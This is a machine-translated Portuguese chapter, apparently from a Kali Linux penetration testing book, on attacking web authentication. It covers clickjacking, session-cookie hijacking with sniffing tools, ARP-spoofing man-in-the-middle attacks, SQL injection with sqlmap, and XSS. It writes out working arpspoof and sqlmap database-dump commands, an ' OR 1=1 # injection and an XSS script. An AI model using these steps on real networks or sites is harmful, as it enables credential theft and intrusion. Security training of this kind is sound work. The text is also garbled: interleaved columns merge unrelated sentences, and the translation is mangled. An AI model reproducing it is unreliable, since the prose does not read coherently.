e segredos do Windows da confiana da prpria identidade. multifatorial (PIV) ou
ramos de registo. creddump pode Isso pode envolver autenticao, ou seja, uma Carto de Acesso Comum (CAC),
extrair LM e NT hashes (SYSKEY confirmar a identidade de uma combinao de passos de juntamente com uma senha, para
protegida), armazenada em cache pessoa, programa ou hardware, tais autenticao para provar sua atender os usurios tm algo
senhas de domnio e segredos LSA. como a verificao Joseph identidade.
e saber. comum que os em sistemas host atravs de uma sesses com privilgios de alto nvel, Clickjacking
trabalhadores remotos para usar um gesto cookie. A partir da, vamos e tempo ilimitado para acessar o Clickjacking uma tcnica onde um
token digital que produz olhar para esconder em aplicativo web. atacante engana um usurio a clicar
um nmero fresco a cada poucos entre o cliente eo servidor utilizando por isso que os recursos de em algo
segundos, juntamente com um PIN tcnicas de ataque man-in-the-middle. segurana de gerenciamento de alm do que eles acreditam que esto
para representar algo que A ltima sesso, como intervalos de tempo clicando. Clickjacking pode ser usado
ter e saber. Locais fsicos de alta tpicos sero identificar e explorar a limite da sesso para revelar
segurana pode exigir a digitalizao fraqueza na forma como aplicaes e certificados SSL, foram criados. De informaes confidenciais, como as
de impresses digitais web aceitar qualquer forma, as ferramentas credenciais de login, bem como
junto com PIN para acesso. dados de autenticao atravs de disponveis em Kali pode identificar permitir uma
Tecnologia de controle de acesso de SQL e cross-site scripting (XSS). falhas na forma como as sesses so invasor assuma o controle do
rede pode verificar como a [176] gerenciados, como a captura de uma computador da vtima. Clickjacking
usurio autenticado em um sesso ativa em uma web geralmente expe um
computador porttil, bem como Captulo 5 Sair ps aplicao de usurio e usar a problema de segurana navegador ou
procurar um certificado escondido Atacar o gerenciamento de sesses sesso para outra pessoa (tambm vulnerabilidade usando o cdigo
para verificar Autenticao e gerenciamento de conhecido incorporado ou script que
a identidade do sistema e do usurio sesso compem todos os aspectos como um ataque de fixao de executado sem o conhecimento da
antes de fornecer recursos de rede. da manipulao de usurio sesso). vtima. Um exemplo de realizao
crtico autenticao e gerenciamento de Ataques de gerenciamento de sesso de clickjacking
identificar o mtodo de autenticao sesses ativas. Com relao s pode ocorrer usando vulnerabilidades tendo o texto do hiperlink para um site
usado pelo seu alvo durante o aplicaes web, em aplicaes ou como confivel diferente do que o prprio
reconhecimento uma sesso o perodo de tempo que usurios acessar e autenticar para site. A mdia
fase de um teste de penetrao, assim os usurios gastam em um site. A essas aplicaes. Formas comuns usurio no verificar antes de clicar
voc pode planejar uma estratgia melhor prtica a gesto atacantes fazer isso em hiperlinks, ou avisos mudanas
para contornar essa confiana. sesses autorizadas (isto , o que atravs de cross-site scripting ou associadas com
O foco deste captulo em torno de voc tem permisso para acessar), ataques de injeo de SQL para um tentativas clickjacking comuns,
como os usurios e dispositivos de com base em como as pessoas servidor web, o que ser tornando esta uma forma muito eficaz
autenticao para web e dispositivos de autenticao, bem coberto mais tarde neste captulo. Os de ataque.
aplicaes com o objetivo de como, controlar o que e quanto tempo invasores tambm podem tirar No exemplo a seguir, o usurio ver
comprometer essa confiana. Vamos os recursos proveito de cookies de sesso em Visite-nos no Facebook.com No
comear atacando o esto disponveis durante a sesso navegadores da web ou vulne- entanto, quando
processo de gerenciamento de ativa. Isso faz com que a autenticao rabilidades em pginas web para clicar no texto, eles vo realmente ser
sesses de autenticao, que como um aspecto fundamental da alcanar resultados semelhantes. redirecionado para
a confiana estabelecida entre gerenciamento de sesses Vamos comear www.badfacebook.com.
o cliente e o servidor. Em seguida, autorizadas. olhando para uma tcnica usada para <a
vamos nos concentrar nos clientes, O objetivo de um verificador da enganar os usurios para que href="http://www.badfacebook.com">
atacando como os dados so penetrao identificar contas que divulguem informaes sensveis, ou Visite-nos em Facebook.com </ a>
armazenados so permitidos o acesso a expondo-se a ataques atravs de [177]
hiperlinks e iFrames modificadas.
Atacando Autenticao Cookies so um pequeno pedao de autentica. O sinal de sesso usada o atacante fora da sesso. Este um
Clickjacking pode ser mais malicioso e dados enviados de um site e como uma forma de reconhecer entre problema para alguns aplicativos
complicado do que mudar hiperlinks. armazenado em uma teia de usurio diferentes mveis que
Os atacantes que usam clickjacking navegador enquanto o usurio est ligaes. Seqestro de sesso ocorre biscoitos de alavancagem que no
iFrames normalmente incorporar em acessando o site. O site pode usar um quando um atacante captura um token expiram, ou seja, um atacante pode
uma pgina web. O contedo cookie para de sesso e obter acesso
dos iFrames contm dados do site de verificar o retorno do usurio para o injeta-lo em seu prprio navegador para a vida, se um token de sesso
destino e, geralmente, colocado sobre site e obter informaes sobre o para ter acesso a sesso autenticada vlido capturado.
um usurio do anterior da vtima. Muitos Web site no suportam logins
ligao legtimo o que torna difcil de atividade. Isso pode incluir as pginas Essencialmente, o ato de substituir paralelas, que nega o uso de um
detectar. que foram acessadas, como logado, bolinho no autorizado de um bolinho roubado.
Para criar o seu prprio ataque de eo que atacante com uma vtima Sesso de Ferramentas Web
clickjacking, voc pode usar a botes foram pressionados. Toda vez bolinho autorizado. A prxima seo ir cobrir as
ferramenta por clickjacking Paul que voc entrar em um site, como o Existem algumas limitaes de ferramentas utilizadas para sesses
Stone, Facebook, Gmail, ou ataques de seqestro de sesso: web de teste de penetrao.
que pode ser baixado em: Wordpress, o seu browser atribui-lhe Algumas ferramentas no esto
http://www.contextis.com/research/tool um biscoito. Roubar cookies intil se o alvo est disponveis em Kali1.0, no entanto,
s/ [178] usando https:// para a navegao, e elas podem ser obtidas em linha.
clickjacking-ferramenta /. criptografia end-to-end est habilitado. [179]
Depois de ter baixado a ferramenta, Captulo 5 A adoo tem sido lenta, no entanto, a
voc pode us-lo para ter o cdigo de Os cookies podem incluir a histria de maioria Atacando Autenticao
outro rastreamento dos usurios por longos sites seguros fornecer essa defesa Plugins do Firefox
site, como um boto de voto ou como perodos de tempo, incluindo contra ataques de seqestro de O mtodo manual para realizar um
um boto. A ferramenta funciona com comportamento em um site de anos sesso. sequestro sesso est roubando a
clickjacking atrs. Os cookies tambm podem Voc pode usar sslstrip como um autenticao da vtima
Firefox 3.6. A ferramenta por Paul armazenar senhas e valores do mtodo para impedir que o seu alvo cookie. Uma maneira de conseguir
Stone no ir funcionar com verses formulrio de estabelecer isso a injeo de um script em um
mais recentes do Firefox; um usurio tenha previamente uma https conectar antes de lanar web comprometido
no entanto, voc pode executar vrias preenchido, tal como seu endereo ou um sequestro de sesso ou outro servidor de aplicativos to cookies so
verses do Firefox no arsenal nmero de carto de crdito. Este ataque. Ver capturados sem o conhecimento da
incluindo Kali til para as empresas, tais como Captulo 3, os ataques do lado do vtima. A partir de
Firefox 3.6 ou mais. varejo olhando para proporcionar uma servidor, para mais informaes sobre l, o atacante pode colher os cookies
Website cdigo muitas vezes muda, experincia simplificada sslstrip. de autenticao e usar uma
por isso certifique-se de ajustar os para os consumidores. Um token de ferramenta de cookie injetor
seus ataques para sesso entregue a partir de um A maioria dos cookies expiram quando para substituir o cookie do atacante
acomodar atualizaes que espelham servidor web a qualquer hora uma o alvo fizer fora de uma sesso. Este com um cookie roubado autorizado.
o site confivel. srie tambm registra Outros mtodos utilizados
Cookies de sesso Sequestro web
para roubar cookies so packet usado para fazer Firesheep voar alteraes no contedo da Cole uma string Wireshark copiado na
sniffing, o trfego de rede e operacional num ambiente Linux, no pgina web antes ou depois que a caixa de entrada e clique em Ok para
comprometer hosts. Roubo entanto, pgina carregada. Greasemonkey injetar os cookies
cookies sero abordados mais adiante Recomenda-se a utilizao de uma pode ser usado para personalizar uma na pgina atual. Veja o Wireshark
neste livro. ferramenta mais actual. aparncia pgina web, as funes da seo sobre como copiar os cookies
O navegador Firefox oferece muitos Web Developer - Plugin do Firefox web, a depurao, for Cookie
encaixes que podem ser utilizados Web Developer uma extenso para combinando dados a partir de outras Injector utilizando Copy, Bytes, e
para injectar biscoitos roubados Firefox que adiciona ferramentas de pginas, bem como outros fins. selecione Somente Texto para
no navegador de um atacante. Alguns edio e depurao para Greasemonkey impresso no Wireshark. O prximo
exemplos so GreaseMonkey, Cookie desenvolvedores web. Web Developer necessrio para fazer outras duas imagens mostram prementes Alt
Manager e pode ser baixado gratuitamente a ferramentas, tais como cookies + C, colando um Dump Wireshark
Firesheep. Sugerimos navegar na partir do plugin do Firefox Injector, funcionar corretamente. Cookie, e
marketplace de plugins do Firefox loja. Uma caracterstica em Web Biscoito Injector - Plugin do Firefox clique Ok para ver o pop-up que os
para vrios biscoitos Developer til para seqestro de Biscoito Injector um script de usurio cookies capturados foram escritos no
ofertas de gerenciamento para sesso a capacidade de editar que simplifica o processo de Navegador da Internet.
atender s suas exigncias de cookies. Isto pode ser encontrado manipulao de navegador [182]
penetrao. como uma opo de drop-down a cookies. H uma srie de etapas
Firefox e todos os plugins associados partir do navegador Firefox uma vez manuais para importar um cookie de Captulo 5
no so instalados por padro Web Developer instalado, como uma ferramenta como o Wireshark Os cookies Gestor + - Plugin do
Kali em Linux 1.0. mostrado na imagem seguinte: em um navegador web. Biscoito Firefox
Firesheep - Plugin do Firefox [180] Injector permite ao usurio copiar e Os cookies Gestor + um utilitrio
Firesheep uma ferramenta clssica colar uma parte do bolinho de usado para visualizar, editar e criar
Teste de Invaso usado para auditar Captulo 5 um lixo, e ter os cookies do despejo novos cookies. Biscoito
sesses web. Firesheep Selecionar Ver Informaes Cookie, e criado automaticamente no momento Gerente + mostra informaes
uma extenso para o navegador voc vai ver os cookies armazenados. visto pgina web. detalhadas sobre cookies, bem como
Firefox, no entanto, algumas verses Voc pode clicar Voc deve ter Greasemonkey pode editar mltipla
tm sido em Editar Cookies para abrir o editor instalado para utilizar o script Injector biscoitos de uma vez. Cookie Manager
instvel com recentes lanamentos do de cookie e substituir o cookie atual Cookie. + tambm pode fazer backup e
Firefox. Firesheep atua como um com um Para instalar cookies Injector, restaurar os cookies. Voc pode
farejador de pacotes que intercepta biscoito roubado da vtima. pesquisa no Google para Biscoito baixar Cookie Manager + a partir da
os cookies no criptografados de Greasemonkey - Plugin do Firefox Injector para abrir um download loja plugin do Firefox.
sites, enquanto que transmitem [181] ligao para o script. Quando voc Uma vez instalado, Cookie Manager +
atravs de uma rede. selecionar o download de Cookies pode ser acessado em Ferramentas,
Plugin do Firesheep para o Firefox Atacando Autenticao Injector, Greasemonkey ir seleccionando
oficialmente suportado no Windows e Greasemonkey um plugin do Firefox pop-up, o que levou a sua aprovao Os cookies Gestor +.
MAC, tornando-se incmoda para que permite aos usurios instalar para a instalao. Os cookies Gestor + ir mostrar-lhe
operar em Linux. Trabalho feito sob scripts que fazem no Depois de instalar o script de Cookies todos os cookies capturados pelo
encomenda pode ser Injector, pressione Alt + C para exibir o Firefox. Voc pode rolar
dilogo cookie.
para baixo ou procurar Cookie (s) Biscoito Cadger pode ser baixado a nomes de host. Voc pode copiar os um cookie de domnio capturado da
especfico para visualizar e / ou editar. partir de www.cookiecadger.com. O pedidos para a caixa de clipe e vtima. Uma vez que a carga est
No meu exemplo, eu estou download exportao de informaes, tais como completa, o padro
procura de qualquer cookie ser um arquivo JAR. D um duplo informaes do usurio, e endereos Navegador de Internet ir abrir a
associado clique no arquivo para abri Biscoito MAC. Guias de filtro esto disponveis pgina capturada com os direitos
www.thesecurityblogger.com. Cadger. Um aviso ser para cada seo para associados ao
[183] pop-up perguntando se voc deseja zero em alvos especficos (por bolinho roubado.
ativar a deteco de sesso. Clique exemplo, apenas olhando para os Para ver as informaes de solicitao
Atacando Autenticao em Sim, eo principal domnios do Facebook). de sesso, clique com o boto direito
Os cookies Gestor + torna fcil editar painel ir aparecer. As prximas duas Sempre Biscoito Cadger reconhece no cone da sesso capturado
os cookies existentes. Isto pode ser imagens mostram o Cookie Cadger uma sesso de login, ele captura-lo e e selecione Ver Associado Request.
til para 1.0 d a capacidade Isso o levar de volta para a Pedidos
realizao de vrios tipos de ataques, Arquivo JAR com a mensagem de para carregar a sesso. A imagem aba
como seqestro de sesso e injeo aviso introduo pop-up e cookies seguinte mostra uma captura de e mostrar que sesso.
de SQL. principal sesso do administrador Wireshark
Biscoito Cadger Cadger painel. registrando em Wireshark um dos o protocolo de
Biscoito Cadger uma ferramenta de [184] www.thesecurityblogger.com. Biscoito rede mais popular fonte, livre e aberto
teste de penetrao usado para Cadger mostrar um cone e analisadores. Wireshark pr-
auditar sesses web. Biscoito Captulo 5 explicar o tipo de sesso capturado. instalado em Kali e ideal para soluo
Cadger pode incluir solicitao HTTP Para comear, selecione a interface Este poderia ser um Hotmail, de problemas de rede,
detalhada captura e reproduo de apropriada, e clique em Iniciar Facebook, ou neste anlise, e para este captulo, uma
HTTP inseguro captura. Biscoito Cadger exemplo, Wordpress de login. ferramenta perfeita para monitorar o
Requisies GET, como itens oferece a possibilidade de tomar em [186] trfego de potenciais alvos
solicitados, agentes de utilizador, mltiplas interfaces, se disponvel. com o objetivo de capturar os tokens
referrer e autorizao bsico. [185] Captulo 5 de sesso. Wireshark usa um widget
Biscoito Cadger pode fornecer uma Para ver as sesses reconhecidos, toolkit GTK + para
anlise ao vivo para Wi-Fi e redes Atacando Autenticao clique na aba Sesses reconhecidos implementar a sua interface de
com fio, bem como Biscoito Cadger pode enumerar todos e pegar uma sesso a partir da janela, usurio e pcap para capturar pacotes.
carga de captura de pacotes arquivos os dispositivos encontrados na rede como mostrado na imagem anterior. Ele opera de forma muito semelhante
(PCAP). Biscoito Cadger tambm disponvel. Uma vez ao
inclui deteco de sesso para Por exemplo, a imagem seguinte realado, clique no Carregar Sesso umatcpdump comando, no entanto,
determinar se o usurio est mostra um i686 Linux usando o Selecionado boto para repetir a atuando como uma interface grfica
conectado em pginas web como Firefox e Iceweasel. sesso. Biscoito com a classificao integrado
Wordpress e Facebook. Biscoito Atividades recentes encontrado por Cadger ir exibir Carregando na janela e opes de filtragem.
Cadger considerado por alguns Cookie Cadger exibido no texto azul inferior, e um navegador abrir logged [187]
como Firesheep em esterides. para cada campo. como o usurio durante a sesso
O Biscoito Cadger no vem com Kali Voc pode visualizar detalhes sobre o capturado. A figura a seguir mostra Atacando Autenticao
1.0. local onde o anfitrio o surf, nomes abertura
como netbios e
Wireshark pode ser encontrado em padro criptografada, no entanto, Hamster um utilitrio usado para acessando Sniffing / Spoofing |Sniffers
Sniffing / Spoofing |Sniffers de rede, e voc pode desativar o https e procurar roubar cookies com seqestro de Web e selecionando Ferret. ATerminal
selecionando o GX parmetro sesso HTTP com passivo janela pop-up com algumas opes.
Wireshark bem como sob a Top 10 contido numa http.cookie para sniffing tambm conhecido como Digite furo-i INTERFACE para
Ferramentas de segurana categoria. identificar os cookies do Gmail no Sidejacking. Hamster escuta em uma selecionar
Para comear a capturar o trfego, garantidos. A sequncia rede, captura qualquer a interface para farejar com Ferret.
selecione o Captura e separador imagem mostra captura o cookie de cookies de sesso visto, e as Ferret ir dizer-lhe que est cheirando
Interfaces. Voc vai ver o login em um blog Wordpress: importaes roubado biscoitos em um eo comando
interfaces disponveis para captura. [189] ambiente GUI navegador para aviso ir pendurar em um estado de
No meu exemplo, eu estou indo para o atacante pode repetir a sesso. execuo. Como voc pode ver o
selecionar eth0 clicando em Atacando Autenticao Hamster usa Ferret para pegar trfego, a captura de trfego ser
na caixa de seleo ao lado de eth0 e Uma vez que voc capturar um cookie cookies de sesso. exibida
selecionando Iniciar. sem garantia, voc deve usar uma Hamster pode ser acessado por como texto em Ferret.
Voc no pode ver o trfego se a outra ferramenta para injet-lo em navegar para Sniffing / Spoofing [191]
interface de rede em que voc est seu navegador para completar o |WebSniffers e
captura no suporta o modo seqestro de sesso. Escolha o selecionando Hamster. Atacando Autenticao
promscuo, ou porque o cookie vtimas, com o boto direito Quando voc inicia Hamster, um Uma vez Ferret est em execuo,
OS no pode colocar a interface em clique na linha, e selecione Cpia Terminal abrir o incio do servio de navegar de volta para Hamster, e voc
modo promscuo. Mais informaes |Bytes |Texto para impresso Hamster. O deve comear a
sobre o somente. Agora, voc pode colar IP proxy padro ser 127.0.0.1:1234. veja pacotes. Todas as metas da rede
diferentes modos de captura e soluo isso em um Injector Cookie, como o Voc pode acessar Hamster abrindo aparecer. Clique em um alvo para
de problemas pode ser encontrada em Firefox plugin do Biscoito Injector. um navegador e navegar para ver
www.wireshark.org. Veja Cookies http://127.0.0.1:1234. biscoitos capturadas.
[188] Injector para completar o ataque [190] Clique em qualquer cookie para
seqestro de sesso em plugins do acessar a sesso de captura. No meu
Captulo 5 Firefox. Captulo 5 exemplo, eu repetir acessando
Wireshark ir capturar todo o trfego Voc deve ter o Greasemonkey e O trfego deve viajar atravs do www.thesecurityblogger.com.
visto no fio. O trfego pode ser filtrado, Cookies Injector para copiar / colar hamster para que ele faa o seu [192]
digitando no navegador Firefox. trabalho. Voc pode selecionar qual
itens especficos no espao de Existem muitas ferramentas teis adaptador Captulo 5
filtrao ou por ajustamento da disponveis que suportam captura usar clicando no link adaptadores. Man-in-the-middle ataque
organizao de dados atravs do topo Wireshark e simplificar Para o meu exemplo, eu estou indo Um ataque man-in-the-middle uma
tabelas, como protocolo ou destinos. foram encontrados dados. Um para farejar eth0. forma de escuta ativa em que o
Wireshark captura um monte de exemplo o NetWitness Investigator Hamster est redireccionado para atacante
detalhes, por isso importante para que pode ser baixado gratuitamente uma pgina de atividade Sidejacking. faz uma conexo com as vtimas e
filtrar por coisas especficas, a partir de www.emc.com. Voc vai notar que no so retransmite mensagens entre as
como parmetros para os cookies no Hamster e Ferret receber quaisquer pacotes. Hamster vtimas, tornando-os
garantidos como http.cookie. Por precisa de um sniffer para pegar
exemplo, o Gmail por trnsito. Voc pode usar Ferret
acredito que eles esto falando arpspoof usada quando um atacante Atacando Autenticao |Sniffers de rede, e selecionando
diretamente para o outro. H muitas envia falso Address Resolution TERMINAL 1: dsniff. ATerminal janela ser aberta,
formas de este ataque, Protocol (ARP) arpspoof-t 172.16.76.128 172.16.76.2 exibindo
como o uso de um roteador sem fio mensagens em uma rede de rea / / diz vtima 2 voc o os comandos de uso para dsniff, como
Hak5 abacaxi que pretende ser uma local. O objetivo deste processo gateway padro mostrado na imagem seguinte:
rede sem fio confivel associar o TERMINAL 2: Para iniciar dsniff, tipo dsniff e
ponto de acesso, enquanto realmente endereo MAC do atacante com o arpspoof-t 172.16.76.2 172.16.76.128 selecione a interface para farejar
agindo como um man-in-the-middle endereo IP de outro host, fazendo / / diz vtima 1 voc o usando -I e a
entre vtima e com que todo o trfego gateway padro interface. Para o meu exemplo, eu
rede sem fio. Outro exemplo usar voltados para o endereo de IP para Se voc digitar os comandos digitei dsniff para capturar todo o
Kali para encaminhar o trfego entre ser enviado para o atacante vez. corretamente, voc deve ver que o trfego em eth0 como mostrado
uma vtima Um mtodo manual para realizar uma trfego est sendo reproduzido na imagem seguinte:
eo roteador padro, enquanto sniffing man-in-the-middle est usando atravs do sistema de ataque. Trfego dsniff vai pegar todas as informaes
para informaes teis, tais como arpspoof e dsniff no est indo para e da vtima, de de login. Se a vtima registra em um
credenciais de login. a sentar-se entre os sistemas. O modo a sistema via FTP para
Muitos servios em nuvem como o primeiro passo identificar o endereo vtima no iria ver o trfego que vai exemplo, voc vai ver a tentativa de
Facebook eo Gmail alavancagem IP da sua vtima para fora da rede neste momento. login e credenciais uma vez que a
login seguro eo gateway padro da rede, utilizando Para completar o sesso fechada,
via HTTPS, o que impede um ataque tcnicas de Captulo 2, ataque, voc precisa habilitar IP para porque dsniff precisa ver toda a
genrico man-in-the-middle. Para Reconnaissance frente para que o trfego continuar a sesso.
ignorar - Conceitos Bsicos, Depois de saber fluir a partir do padro [195]
HTTP seguro, voc pode usar sslstrip, os endereos de IP, voc precisa dizer porta de entrada para a vtima e vice-
que ir revelar todas as informaes a sua vtima voc versa, enquanto o atacante est Atacando Autenticao
de login so realmente um outro sistema ou o observando o trfego entre Ettercap
ao seu ataque man-in-the-middle. O gateway padro. Por exemplo, se uma a vtima eo gateway padro. Ettercap um conjunto abrangente
sslstrip / man-in-the-middle vtima Abra um tero Terminal janela e digite: livre e de cdigo aberto para o man-in-
combinao um mtodo muito eficaz 172.16.76.128, o gateway padro echo 1> / proc/sys/net/ipv4/ip_forward the-middle baseados-
para roubar credenciais de login da 172.16.76.2 eo invasor Neste ponto, o trfego deve fluir entre ataques.
vtima, se 172.16.76.131, a vtima eo gateway padro, enquanto Ettercap pode ser usado para anlise
voc tem um sistema de ataque na voc deve definir o seu endereo IP indo atravs do sistema invasor. A de protocolo de rede de computadores
mesma rede que o sistema (s) alvo. 131 para se parecer com a vtima e figura a seguir mostra o de ping falhar e auditoria de segurana,
dsniff e arpspoof gateway padro usando enquanto para a frente IP no est com sniffing conexes ao vivo,
dsniff um conjunto de senha sniffing o comando arpspoof. habilitado. filtragem de contedo e suporte para
e ferramentas de anlise de trfego de Abrir dois Terminal janelas e digite os [194] ativa e passiva
rede projetados para seguintes comandos em cada janela disseco de vrios protocolos.
analisar diferentes protocolos de para Captulo 5 Ettercap trabalha pondo rede do
aplicao e extrair informaes falsificar suas vtimas: Em seguida, lanar dsniff para assistir atacante
relevantes. [193] ao trfego. dsniff pode ser encontrado
em Sniffing / Spoofing
interface em modo promscuo e ARP e um roteador para um ataque lanar o seu ataque man-in-the-middle ter dito emalhe para exibir imagens,
para o envenenamento das mquinas clssico man-in-the-middle. Selecione antes de lanar redes de deriva. eles aparecero nesta janela. Se voc
vtima. cada alvo, e clique no Emalhe pode ser selecionou
Para iniciar Ettercap, navegue at caixa de seleo apropriada. Voc executados simultaneamente para no para exibir imagens, como o uso -
Sniffing / Spoofing |Sniffers de rede e pode verificar as metas, navegando dar-lhe rapidamente a visibilidade de Um, As imagens no aparecem, no
selecione at Alvos e todas as imagens voando entanto, ser enviados para
o Ettercap grfica. selecionando Alvos atuais. o fio. a pasta especificada no comando de
O primeiro passo selecionar qual [197] [198] execuo. A imagem seguinte
interface voc pretende farejar. emalhe
Navegue at a Farejar tab, Atacando Autenticao Captulo 5 a captura de imagens a partir de um
selecionar o tipo de sniffing (Unified Em seguida, podemos olhar para as Emalhe pode ser encontrado em surf vtima www.drchaos.com.
sniffing ou Sniffing em ponte) ea opes de man-in-the-middle Sniffing / Spoofing |Sniffers Web e [199]
interface voc planeja encontradas embaixo da aba MITM. selecionando
para farejar. H opes para Envenenamento ... Emalhe. Emalhe abrir como um Atacando Autenticao
[196] Arp, ICMP redirecionar ..., Port roubar Terminal mostrando como usar a SQL Injection
..., e Dhcp ferramenta. Voc ir Um banco de dados armazena dados
Captulo 5 spoofing .... Para este exemplo, precisa especificar qual interface voc e organiza-lo em algum tipo de forma
Agora, Ettercap vai mostrar mais vamos selecionar Arp envenenamento quer cheirar eo que voc quer fazer lgica. Oracle e
opes de menu, como mostrado na ... e escolher o Farejar com Microsoft SQL so exemplos
imagem seguinte: conexes remotas parmetro. imagens captadas fora do fio. Por populares de sistemas de
Vamos verificar a rede para hosts Agora, estamos prontos para capturar exemplo, voc pode optar por ter um gerenciamento de banco de dados
disponveis. Navegue para os Hosts e o trfego entre o roteador e nosso sinal sonoro que permitem
selecione Digitalizar para vtima. Interessante para cada imagem usando o -B usurios para criar vrios tipos de
hospedeiros. Ettercap rapidamente informaes, tais como nome de imagens de comando, exibio na tela bancos de dados usados para
digitalizar toda a classe Ce listar todos usurio e senha, podem ser do terminal, ou armazenar, consultar e organizar
os hosts identificados. Geralmente capturados e enviar imagens capturadas para um dados
o roteador o primeiro anfitrio que se exibido na janela de execuo. diretrio. A captura de tela fornecido de forma criativa.
encontra. A figura a seguir mostra Emalhe mostra um exemplo de Structured Query Language, que
quatro dispositivos Emalhe uma ferramenta de man-in- a captura de imagens a partir de eth0 mais conhecido como SQL, o
encontrado durante uma verificao. the-middle usado para capturar e colocando as imagens em uma sublinhado
Neste exemplo, encontramos quatro imagens de trfego de rede ao vivo. pasta localizada no / Root / linguagem de programao comum
dispositivos. Podemos supor .1 o Emalhe exige um ataque man-in-the- Desktop / CapturedImages. que entendido pela maioria de
roteador, e ns middle a ser estabelecido antes de O exemplo a seguir supe um ataque gerenciamento de banco de dados
ser alvo da mquina da vtima 0,128. trabalhar. Voc existente man-in-the-middle sistemas. Ele fornece uma maneira
Vamos selecionar o roteador para pode aproveitar a arpspoof e dsniff ou estabelecida usando eth0 como a comum para a aplicao para acessar
Meta 1 e mtodos Etthercap anteriormente porta de escuta. os dados no banco de dados
a vtima 0,128 para Meta 2. Isto ir coberto para Depois de emalhe lanado, um usando um conjunto comum de
colocar o nosso sistema entre a vtima separado em branco Terminal janela comandos no banco de dados pode
pop-up. Se voc entender.
Os atacantes exploram esses bancos O plugin de Firefox HackBar vai deixar vulnervel a injeo de SQL, porque ampla gama de recursos de testes de
de dados, tornando-os informaes de voc testar consultas SQL e injetar o servidor est respondendo a erros penetrao que variam de banco de
sada que suas prprias consultas de SQL. dados de impresses digitais
no devem ser visualizadas. s vezes, para mudar solicitaes SQL. O plugin Vamos colocar em injeo SQL, para acessar o sistema de arquivos
isso to simples como o atacante HackBar tambm ir permitir que um adicionando um OR 1 = 1 # # subjacente e executar comandos no
pedindo verificador da penetrao declarao no final de sistema operacional
informaes privilegiadas do sistema examinar as informaes HTTP a linha. sistema atravs de ligaes de fora-
de gerenciamento de banco de dados. POST. Uma vez que executar o cdigo, que de-banda.
Outras vezes, [200] est conectado como administrador Os recursos incluem suporte para
aproveitando configuraes pobres para www.drchaos.com. sistemas de gerenciamento de banco
por administradores de banco de Captulo 5 [202] de dados comum, o apoio
dados. Atacantes podem No exemplo a seguir, vamos tentar muitas tcnicas de injeo SQL,
tambm tirar proveito de uma realizar uma injeo de SQL no site Captulo 5 usurios, enumerando os hashes de
vulnerabilidade no sistema de DrChaos.com. Vamos navegar para Temos remendado www.DrChaos.com senha, e muitos
gerenciamento de banco de dados www.DrChaos.com usando o Firefox para que ele no vulnervel a este outros. SqlMap tambm apoia o
que em nosso Kali ataque. processo de banco de dados 'user
permite que o invasor ver ou escrever console do servidor e tentar entrar no No entanto, voc pode ver injees escalonamento de privilgios usando
comandos privilegiados de e para o site. Primeiro, vamos tentar o nome de SQL so muito valiosos para o ataque, Meterpreter do Metasploit getsystem
banco de dados. usurio porque eles comando.
Atacantes tipicamente enviar cdigo administrador ea senha 12345 se dar um verificador da penetrao da SqlMap uma ferramenta que pode
malicioso atravs de formulrios ou de autenticar. Voc ver que ir falhar. web um mtodo fcil para obter ser usada para explorar servidores de
outras partes de uma pgina web Agora, navegue at o Vista barra de acesso total a um sistema. banco de dados e construdo em
que tm a capacidade de aceitar a menus no Firefox e selecione o Sucesso injeo de SQL Kali. Para
entrada do usurio. Por exemplo, um HackBar menu. Clique dependente do conhecimento SqlMap usar, voc vai precisar para
atacante pode entrar aleatria o Carga URL boto e clique no Ativar atacantes de comandos SQL. Se apontar a ferramenta para uma URL
personagens, bem como as dados Postar boto. Voc vai ver a voc precisa escovar acima em suas de um script SQL em um servidor
declaraes de comprimento, com o URL que habilidades de SQL, recomendamos web.
objetivo de identificar a fraqueza na foram entrando em, bem como o olhando W3 School of SQL Estes podem ser identificados porque
forma como nome de usurio e senha que apenas em: eles geralmente tm php na URL.
as variveis de entrada e parmetros tentada. http://www.w3schools.com/sql/sql_intr Voc pode encontrar SqlMap sob
so concebidos. Se um campo de [201] o.asp. Anlise Vulnerabilty |Avaliao do
entrada est definido para aceitar SqlMap banco de dados |
apenas Atacando Autenticao SqlMap automatiza o processo de SqlMap. ATerminal janela ser aberta
usernames at 15 caracteres, uma Vamos agora adicionar uma aspa deteco e explorao de falhas de exibindo a pgina SqlMap ajuda.
mensagem de erro pode aparecer simples aps o nome do usurio injeo SQL e A sintaxe bsica para usar SqlMap :
revelando detalhes administrador. Assim que tomando conta de servidores de SqlMap-u URL - funo
sobre como o banco de dados est clicamos na Executar boto, ns banco de dados. SqlMap vem com um Uma funo comum dbs. O dbs
configurado. recebemos uma injeo de SQL. Isso mecanismo de deteco, bem como palavra-chave ter SqlMap obter os
pode significar o servidor um bancos de dados.
SqlMap-u SqlMap-u servidores web que tiveram dados Google criou o projeto Gruyere como
http://www.drchaous.com/article.php?i http://www.drchaous.com/article.php?i roubados, foi resultado de cross-site um meio para testar exploits aplicao
d=5 - dbs d=5 scripting. web
Voc pode ver a partir de nossos - colunas Ataques cross-site scripting resultaram e defesas. site O projeto Gruyere tem
resultados, temos vrias bases de -T tablesnamehere em atacantes desfigurar sites, vrias vulnerabilidades embutidos
dados que foram encontrados. Para Se houver alguma informao distribuindo para ele, incluindo XSS. Voc pode
esta relevante nas tabelas, ele pode ser malwares para os clientes, e roubar executar o seu prprio projeto de
exemplo, vamos concentrar-se no recuperado usando o informaes sensveis a partir de Gruyere on-line, ou voc pode
banco de dados de teste. seguinte comando: sites, como o crdito transferi-lo para uma mquina local
[203] SqlMap-u carto e outras informaes de para o seu teste.
http://www.drchaous.com/article.php?i identificao pessoal. Uma vez que foram registrados em
Atacando Autenticao d=5 [204] nossa prpria instncia de Gruyere,
Depois de ter encontrado um servidor teste - despejo fomos capazes de copiar o
web vulnervel, voc seleciona o -U teste-dump Captulo 5 seqncia anterior no campo de
banco de dados usando o -T-L tablesnamehere Um mtodo para verificar se h entrada nome de usurio e clicar no
-D comando e o nome da base de Isso ir criar um arquivo chamado vulnerabilidades cross-site scripting Submeter boto. O
dados. teste, E despejar toda a informao verificar se uma entrada imagem seguinte mostra a home page
SqlMap-u teste bruta do campo, como uma caixa de pesquisa, com o Gruyere CHAOS roteiro
http://www.drchaos.com/article.php?id tabela de banco de dados para esse vulnervel. Um exemplo que pode exibido.
=5-D arquivo. Em muitos casos, isso pode ser utilizado para testar um A cadeia utilizada no campo de
- tabelas incluir senhas e outras campo de entrada em um site est entrada a seguinte:
O mesa palavra-chave usada para informaes confidenciais. usando a seqncia de pesquisa CHAOS <script> alert
recuperar todas as tabelas no teste Cross-site scripting (XSS) simples da seguinte maneira: ('www.DrChaos.com') </ script>
